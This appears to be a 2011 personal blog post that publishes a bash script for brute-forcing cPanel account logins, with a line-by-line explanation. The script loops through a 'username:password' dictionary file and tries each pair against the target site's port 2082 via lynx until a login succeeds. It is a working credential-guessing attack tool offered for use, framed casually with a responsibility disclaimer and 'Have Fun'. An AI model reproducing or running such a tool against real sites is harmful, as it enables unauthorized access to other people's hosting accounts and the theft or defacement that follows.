Hasnain Ali Blog

BruteForce tool using linux shell script June 17, 2011

Hello, did you ever try to brute force a website login page and you didn’t find the right tool?
it always happen, so i will explain how i did it with linux shell script.

I wrote a small script to brute force Cpanel accounts:
============================================
#!/usr/bin/env bash
# Cpanel BruteForce v1.0
# Coded By Dr.Death 2008
# drdeath[at]bsdmail.org
#
# This is a simple script that will brute force Cpanel account
#
# I do not take any reponsibilty for what you do with this tool
# Hopefully it will make your life easier rather then making other
# peoples lives more difficult!
#############################
# _____ _____ _ _
# | __ \ | __ \ | | | |
# | | | |_ __| | | | ___ __ _| |_| |__
# | | | | ‘__| | | |/ _ \/ _` | __| ‘_ \
# | |__| | | _| |__| | __/ (_| | |_| | | |
# |_____/|_|(_)_____/ \___|\__,_|\__|_| |_|

#############################

echo “.::Cpanel BruteForcer By Dr.Death::.”
echo
echo -n “Enter domain name for the Cpanel account you want bruteforce:
> “
read site

n=`cat pass_list | wc -l`
for (( i=1; i <= $n; i++));
do

password=`sed -n "$i"p pass_list`

b=`lynx -dump -nolist -auth="$password" ""$site":2082"`

echo trying password $password

if [ ! -z "$b" ]; then

echo "Bengo WebSite "$site" password is: "$password""
echo "Have Fun "
exit 0
fi
done
echo
echo "brute force complete"
echo "no luck, try better dictionary"
exit
==========================================

lets explain what we did:

#!/usr/bin/env bash
to execute the script using bash shell from the environment "env".

read site
set the user input as variable "$site" which will be the website domain name.

n=`cat pass_list | wc -l`
this will print how many lines in file "pass_list" which include passwords list.

for (( i=1; i <= $n; i++));
we put the number we got for the variable "$n" in a for loop, so for example if file pass_list have 1000 password on it we will do the for loop 1000 time, to try all the passwords.

password=`sed -n "$i"p pass_list`
here we use "sed" the steam editor with option "p" to print all the passwords in the pass_list in each loop.
for example in loop number 4 variable $i will have value of 4 and the sed comand will be like this:
"sed -n 4p pass_list" which will print the 4th line from the password file pass_list.

b=`lynx -dump -nolist -auth="$password" ""$site":2082"`
here we use "lynx" the linux command line browser as a socket to connect to the target website.
we use option "-dump" to dump the output instead of waiting user action, "-nolist" to disable the link list feature in dumps, "-auth=" use to set authorization ID and password for protected documents.
for example to access cpanel account for website "example.com" with username "user" and password "pass" it will be like this:
"lynx -dump -nolist -auth=user:pass http://www.example.com:2082"

so password file pass_list should include the usernames and passwords in this format: "username:password"

if [ ! -z "$b" ]; then
here we use if statment with option "! -z" which mean if value of "$b" is not equal to Zero we are logged in and the password is the value of the variable "$password" in the loop we are in and exit successfuly, else continue the loop.

Note: You will need your own password dictionary file to make it work